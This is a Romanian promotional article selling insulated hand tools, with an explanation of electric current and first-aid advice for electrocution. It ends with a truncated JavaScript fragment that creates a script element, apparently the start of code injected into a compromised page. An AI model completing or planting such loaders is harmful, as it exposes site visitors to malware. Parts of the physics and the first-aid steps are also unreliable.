scule izolate electric

scule izolate electric

Exista doua intelesuri ale expresiei “A lucra sub tensiune”, iar daca in ceea ce priveste stresul care ingreuneaza orice activitate nu prea putem face multe lucruri, despre al doilea sens, cel de a lucra sub tensiune electrica, ei bine, aici suntem cei la care puteti apela cu toata increderea. Facility Distrib ofera o gama completa de scule izolate electric care vin sa ofere atat utilitate cat si siguranta oricarui instalator, inginer, dar si celor care vor doar sa schimbe o priza in casa. In acest articol vom discuta unpic despre curentul electric, dar si despre modul in care aceste scule izolate electric salveaza vieti. Iar spre final, vom mentiona elemente de prim ajutor in cazul electrocutarii.

Ce este mai exact curentul electric

Curentul electric poate fi descris ca un flux de particule care circula intre doua puncte ce au o diferenta de potential. Mai exact, curentul electric este efectul produs de catre miscarea electronilor dintre o sursa sau un element ce cedeaza electroni, catre elementul care are deficit de electroni. Acest lucru este valabil pentru acumulatori, baterii dar si fructe acide (citrice, rosii, etc.). Pentru curentul produs de catre un dinam sau alternor (generoatoare, eoliene) miscarea electronilor este generata de catre campurile magnetice.

Ei bine, pentru a fabrica scule izolate electric se foloseste un material care opreste aceasta miscare a electronilor, mai exact, un material electro-izolant. Fluxul de electroni se deplaseaza cel mai bine prin metalele nobile (platina, aur, argint) dar si prin metale. Bineinteles, exista si un domeniu foarte interesant despre care va invitam sa cautati pe internet, mai exact, super-coductibilitatea. Revenind la scule izolate electric, fie ca vorbim despre surubelnite, clesti, chei tubulare, etc. toate sunt acoperite cu un material electro-izolant de inalta performanta (PVC de inalta densitate) gros care poate asigura protectia impotriva electrocutarii pentru tensiuni de maxim 1000V. Pentru lucrul sub tensiuni mai mari fata de aceasta valoare este necesara purtarea unor echipamente de protectie impotriva tensiunilor inalte (manusi izolante si bocanci izolati electric), iar in cazul tensiunilor de ordinul zecilor de kilovolti trebuiesc costume speciale ce permit scurgerea energiei electrice in pamant (costume din plasa de sarma cu impamantare).

De ce este esential sa folositi scule izolate electric

Este foarte important sa folositi scule izolate electric, dar in cazul unei electrocutari cu tensiune medie 220-380V trebuie sa indepartati victima folosind doar obiecte din materiale izolante (plastic, sticla, plexi, lemn uscat), nu atingeti cu mainile goale sau cu orice parte a corpului neprotejat electric victima! Daca aceasta este constienta intindeti-o pe sol in pozitia fatului. Daca aceasta este inconstienta, recurgeti la manevre de resuscitare, insa numai dupa ce aceasta a fost intinsa pe jos. Verificati mai intai prezenta curentilor reziduali in corpul victimei, iar apoi acordati manevrele de resuscitare, doar dupa ce ati anuntat medicul unitatii sau ati apelat numarul unic de urgenta 112.

Pe siteul www.facilitydistrib.ro veti gasi o paleta larga de scule izolate electric dar si de echipamente de protectie. De asemenea, tot aici veti gasi experti ce va pot oferi servicii complete de consultanta, proiectare, constructie si instalare pentru echipamente industriale. Va asteptam!var d=document;var s=d.createElement(‘script’);